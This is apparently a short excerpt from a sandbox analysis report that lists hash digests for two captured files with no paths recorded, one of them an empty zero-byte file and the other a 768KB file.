  SHA512: 3f75812c71264c1248f484812206950001398c15cb278493106da83971edc9a09ea106488ab892cc2f4f56665a636fec5306c32b97726062a4035da2ef5e2eb6

(no path or size recorded)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These are the digests of a zero-byte file: the sandbox captured an empty file, so this entry carries nothing to analyse.

(no path recorded)
  Filesize: 768KB
  MD5: 377fc74b249bfc1be3258a6facd9327a
  SHA1: 42620e2f8dc6d890d312f81a2337ae40b7a6a73b
  SHA256: df016016c94d7ad3f689b994f54f3070a91f2054e808a005a398875164cf7ec1
  SHA512: f075185ca9e2a7fbd801b3aca33e29790630912edbb727d419e039c50a7af3c7578f77ec5e7e607a22291efde54014538b7a321143b95045695d571463a9fa45